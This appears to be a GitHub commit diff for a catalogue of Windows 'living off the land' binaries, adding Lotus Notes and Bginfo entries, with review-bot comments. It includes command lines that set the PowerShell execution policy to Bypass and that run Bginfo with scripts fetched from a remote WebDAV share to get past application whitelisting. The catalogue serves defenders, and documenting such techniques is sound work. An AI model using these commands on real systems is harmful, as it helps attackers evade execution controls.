Merge branch 'master' into master

master
giMini 2018-05-19 13:37:57 -04:00 committed by GitHub
commit 388b6a64ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 96 additions and 6 deletions


@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OTHER NON MICROSOFT BINARIES
[Gpup.exe](OtherBinaries/Gpup.md)
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
[Notes.exe](OtherBinaries/Notes.md)
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)


@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN
Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken
* Matt harr0ey - @harr0ey
Code sample:
*
Resources:
* https://twitter.com/pabraeken/status/994392481927258113
* https://twitter.com/harr0ey/status/975350238184697857
Full path:
```
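Review bot: the `Code sample:` list in this hunk holds a single empty bullet (`*`), which renders as a blank list item; either remove the bullet or point it at an actual sample, as Bginfo.md does with its BGITool link. The added acknowledgement and resource line are consistent with each other (the new tweet is from @harr0ey), so nothing else to change here.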

OtherBinaries/Nlnotes.md Normal file, 31 lines

@ -0,0 +1,31 @@
## Nlnotes.exe
* Functions: Execute
```
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
?
```
Notes:
Used by Lotus Notes
Detection:
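Review bot: `Full path:` is left as `?` and `Detection:` is empty, so this entry cannot yet be used by a defender. Since Notes.md in the same change places notes.exe under `C:\Program Files (x86)\IBM\Lotus\Notes\`, confirm whether NLNOTES.EXE ships in that directory and record it, or write `No fixed path` as Bginfo.md does. The `Notes:` line ("Used by Lotus Notes") should also say how the `-Command if((Get-ExecutionPolicy ) -ne AllSigned) { ... }` argument reaches an interpreter, because `Functions: Execute` and the two resource links are the only hint; once that is stated, a `Detection:` line in the style of Bginfo.md (NLNOTES.EXE launched with `-Command` or `Set-ExecutionPolicy` in its arguments, or spawning a child interpreter) follows naturally. The empty `Code sample:` bullet has the same problem as in the Syssetup hunk.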

OtherBinaries/Notes.md Normal file, 31 lines

@ -0,0 +1,31 @@
## Notes.exe
* Functions: Execute
```
Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
```
Notes:
Used by Lotus Notes
Detection:
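Review bot: the command line on the first fenced line begins `Notes.exe" "=N:\Lotus\Notes\Data\notes.ini"`, that is, a closing quote on the executable name with no opening one, so the line will not run as shown; it should presumably read either `"Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" ...` or `Notes.exe "=N:\Lotus\Notes\Data\notes.ini" ...`. As with Nlnotes.md, `Detection:` is empty and `Code sample:` is a bare bullet; a detection entry naming notes.exe from `C:\Program Files (x86)\IBM\Lotus\Notes\` with `-Command` or `Set-ExecutionPolicy` in its arguments would give this entry the same value as the Bginfo one.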


@ -3,11 +3,35 @@
* Functions: Execute
```
bginfo.exe bginfo.bgi /popup /nolicprompt
(Add vbs code inside .bgi file)
bginfo.exe bginfo.bgi /popup /nolicprompt
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
```
Acknowledgements:
* Oddvar Moe - @oddvarmoe
Code sample:
* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
* https://twitter.com/Oddvarmoe/status/865330067630694400
* https://twitter.com/ItsReallyNick/status/996133093613424641
* https://github.com/3gstudent/bgi-creater
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
Full path:
```
No fixed path
```
Notes:
Used to set background image in Windows with details about the environment
Detection:
Bginfo.exe requesting files externally or running VBS scripts.
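Review bot: the fenced block lists `bginfo.exe bginfo.bgi /popup /nolicprompt` twice, once before and once after the `(Add vbs code inside .bgi file)` line, so one copy is redundant. That parenthetical is an explanatory note rather than a command and would read better under `Notes:` than inside the code fence, which in every other entry holds only runnable command lines. The `Detection:` line ("requesting files externally or running VBS scripts") is a good model for the two Lotus Notes entries added in this same change.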


@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
Would really love if the community could contribute as much as possible. That would make it better for everyone.
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
## STORY
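Review bot: the `hasitate` to `hesitate` fix is correct. The unchanged context line two lines above still reads "has it's own .md file" (should be "its own") and "That way I should be easier to maintain" (should be "That way it should be easier to maintain"); both could be folded into this same typo commit.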
@ -78,4 +78,4 @@ Love this logo:
- [ ] Map it to the Mitre Att&ck <3
- [ ] LOLGuiBins
- [ ] More list based on classifications
- [ ] LOLBAS lists for Linux? OSX?
- [ ] LOLBAS lists for Linux? OSX?
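Review bot: the removed and added lines of this hunk are identical as displayed, so this is a whitespace-only change, most likely adding or removing the trailing newline at end of file; nothing to fix, but the commit message does not mention it, so it is worth confirming that was intended rather than an editor side effect.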